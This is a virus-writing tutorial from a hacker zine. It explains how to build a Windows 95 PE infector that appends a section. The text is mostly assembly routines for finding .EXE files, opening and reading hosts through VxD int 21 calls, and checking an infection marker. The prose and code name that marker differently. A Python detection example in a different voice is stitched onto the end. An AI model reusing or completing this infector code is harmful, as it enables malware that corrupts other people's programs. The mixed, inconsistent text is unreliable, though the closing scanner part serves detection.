/-----------------------------\
| Xine - issue #2 - Phile 011 |
\-----------------------------/

PE Infection school
by JHB

Infecting PE files is a little more complex than in DOS: you must also do some "strange" things to open and read files. For those among us who know little about Windows this may be tough to grasp, but it is just another hurdle that Microsoft has put in front of virii writers / just plain hackers of Win95. I will try in this article to break it down into manageable steps, but I will concentrate on the infection part and leave the other aspects to other articles and other people, I hope, to explain. This article will be specific to a PE infector that adds a section. Try reading the last two VLAD issues and IR's latest zine for more info on RVAs and other PE/Win95 features. OK, I will probably gloss over things that you might feel are important; if so, I hope you take the hint that "you" might need to study some more.

Here we go, school is in session. Let's start with some info that we all, as virii writers or researchers, should know: the steps a virus makes to spread.

1 Find a file
2 Read enough of the file into a buffer to determine
  A If it is a file the virii can infect.
  B If it is already infected
3 At this point we know the file appears to be a proper host.
  A Write the virii to the end of the host.
  B Modify the header, write it to the host
  C Close the host
4 Well, at this point we return control to the original host.
  (this is a part I am going to only give a glimpse at)

Due to the way Win95 "guards" the interrupts, the virii needs to get access to the Win API.

Bizatch: The first VLAD PE virus saves the API's address in itself; this form of hardcoding can cause the virus to fail in other versions of Win95.
Punch: The VLAD VxD virus does this by fooling with the imports and then fixing it so the host sees it as it should be.
Mr Klunky: IR's VxD virus, not sure, sorry Mr K, just have not had time.
Murkry: The first PE header infector (by my friend) also uses the hardcoding method.
Spawn95: This virus is a companion virus and of course uses the APIs like a normal PE program does.
Puma: First seen in this issue of Zine 2, uses a search engine to get the API address. Should be more robust than the hardcode method, but Punch95's method should be a better way.

OK, a brief synopsis of some Win95 viruses and how they grab APIs. Well, I wanted a simple way, and sort of wanted it to be like DOS infections. Hmm, well there is a way to call int 21s in Win95: you need the first exported API, which is called CallVxD0 by some books. This program will use that method; it has the added advantage of allowing the virus to use int 21-like calls. It may not be as robust as Punch's method, but it should work better than straight hardcoding. Read the notes on the GetProc engine in Zine 2 to find out more about this, and also the article on hooking APIs in Zine 2. Wow, that's enough of a tangent and probably bored the hell out of most of ya ;). On to the virii code.

-----1 Find a file.
Well, Win95 has a FindFirst and a FindNext routine we can call using VxDcall int 21 (just called int21 from now on). If this looks familiar it should: it's just the Win95 version of int 21h 4Eh and int 21h 4Fh.

FILE    equ 00400300h   ;data
FNAME   EQU 02CH        ;for the find file routines
Fexe    db '*.EXE',0

FindFile:
        mov     eax,0000714eh
        mov     edx,offset Fexe
        xor     esi,esi
        inc     esi
        push    ds
        pop     es
        mov     Edi, FILE
        xor     ecx,ecx
        Call    INT_21
        mov     ebx,eax
        ret
;-------------------------------------------------------------
;ax = 714Fh
;bx = file handle from previous search
;si = date time requested
;es:di buffer for findata
;note ebx = the search handle
FindNext:
        mov     eax,0000714fh
        mov     esi,1
        mov     edi, FILE
        call    INT_21
        ret
;-------------------------------------------------------------

-----2 Read enough of the file into a buffer to determine
----- A If it is a file the virii can infect.

Again, use the int21 open file:

;-------------------------------------------------------------
;usual dos function here just need the filename from the search routine
;check cf for error
OpenFile:
        mov     eax,00003d02h
        mov     Edx,FILE + FNAME
        xor     ecx,ecx
        call    INT_21
        mov     EBX,eax
        ret
;-------------------------------------------------------------

Use the int21 read file:

;-------------------------------------------------------------
;ecx number of bytes
;edx = where we write the info to
ReadFile:
        mov     eax, 00003f00h
        ;mov    ecx,2
        ;mov    Edx,OFFSET test
        call    INT_21
        ret
;-------------------------------------------------------------

But Win95 throws a problem here: you can't write to the host data, it might be initialized data and you would destroy it. So I am using the "dead" space from the PE header to the first segment to write to; this is only possible due to the fact that the VxD calls ignore the limits that Win95 can put on us. Then I can move the important stuff to the stack and read/write there. The stack is small, and rather than change it I use it as little as I can.
OK, we now have the header in memory. The typical PE header, including the interesting tables, is about 1K in size. Actually it's usually a lot smaller, but 1K will read in the DOS MZ header and the PE part.

-------B If it is already infected

Well, for this test we can check the section names for our header; XINE is as good a name as any ;). So we check the last section header.

1 Find the PE: find the offset by looking into the MZ header at offset 3Ch, then use that offset to get the other info. Just for simplicity, () means the value we are pointing at and [] means a constant:

    PEhder(3CH) + PE_SIZE[F8H] + ((NumSect(6)-1) * SecSze[28H])

OK, this value is the pointer to the last section header name. Now put this in esi and do lodsw.

        mov     esi,[PEHDER]    ;3Ch
        push    esi
        add     esi,6
        mov     eax,[esi]
        dec     eax
        mov     cx,SECSZE       ;28h
        mul     cx
        pop     ecx
        add     eax,ecx
        add     eax,PeSize      ;0F8h
        push    eax
        pop     esi
        lodsd
        cmp     eax,"xki."
        jne     InfectIt
AllReady:
        ret
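The same header walk (MZ at 0, e_lfanew at 3Ch, NumberOfSections at PE+6, a 28h-byte section header, 4-byte compare of the last section name) is what a scanner or IR tool does to look for an appended-section infection marker. Below is an added Python example written from that side; it is not code from the article. It reads SizeOfOptionalHeader instead of assuming the fixed F8h, so it also handles PE32+ and non-default optional-header sizes, and it rejects truncated tables. The marker bytes and the headers-only test image are constructed for the example.

```python
import struct

E_LFANEW_OFFSET = 0x3C        # PEhder(3Ch): pointer to "PE\0\0" stored in the MZ header
NUM_SECTIONS_OFFSET = 6       # NumSect(6): NumberOfSections, relative to the PE signature
SIZE_OPT_HDR_OFFSET = 20      # SizeOfOptionalHeader, relative to the PE signature
COFF_HEADER_END = 24          # 4-byte signature + 20-byte COFF file header
SECTION_HEADER_SIZE = 0x28    # SecSze[28h]


def last_section_name(image: bytes) -> bytes:
    """Return the raw 8-byte Name field of the last section header, with bounds checks."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, E_LFANEW_OFFSET)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    num_sections = struct.unpack_from("<H", image, e_lfanew + NUM_SECTIONS_OFFSET)[0]
    if num_sections == 0:
        raise ValueError("PE has no sections")
    # The article's fixed F8h is 24 + 0E0h, i.e. only right for PE32 with a default
    # optional header; reading the real size keeps the walk correct for PE32+ too.
    size_opt = struct.unpack_from("<H", image, e_lfanew + SIZE_OPT_HDR_OFFSET)[0]
    first_section = e_lfanew + COFF_HEADER_END + size_opt
    last = first_section + (num_sections - 1) * SECTION_HEADER_SIZE
    if last + SECTION_HEADER_SIZE > len(image):
        raise ValueError("section table runs past end of file")
    return image[last:last + 8]


def has_marker(image: bytes, marker: bytes) -> bool:
    """Mirror the article's lodsd/cmp: does the last section name start with marker's 4 bytes?"""
    return last_section_name(image)[:4] == marker[:4]


def build_test_image(section_names):
    """Constructed test data: a headers-only PE32 layout, not a runnable program."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew)
    opt_size = 0xE0
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x10F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    secs = b"".join(n.ljust(8, b"\0") + bytes(SECTION_HEADER_SIZE - 8) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    img = build_test_image([b".text", b".data", b".ikx"])   # ".ikx" is a constructed marker
    print(last_section_name(img).rstrip(b"\0"), has_marker(img, b".ikx"))
```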